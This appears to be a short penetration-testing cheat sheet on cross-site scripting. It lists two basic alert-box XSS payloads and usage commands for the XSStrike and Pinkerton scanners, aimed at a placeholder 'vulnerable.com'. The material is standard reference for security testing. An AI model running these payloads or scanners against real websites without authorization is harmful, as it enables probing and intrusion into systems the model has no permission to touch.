XSS

XSS with HTML

<p><script>alert(document.domain)</script></p>
<p><img src=1 onerror=alert(1)></p>

Automation

XSSTRIKE

# GET request
python xsstrike.py -u http://vulnerable.com/?param=test

# POST reqeust
python xsstrike.py -u http://vulnerable.com/post --data "username=test&email=test&comment=test"

# data as JSON
python xsstrike.py -u http://vulnerable.com/comment --data '{"comment": "test"}' --json

PINKERTON

git clone https://github.com/oppsec/pinkerton.git
pip3 install -r requirements.txt

python3 main.py -u https://example.com

Last updated

Was this helpful?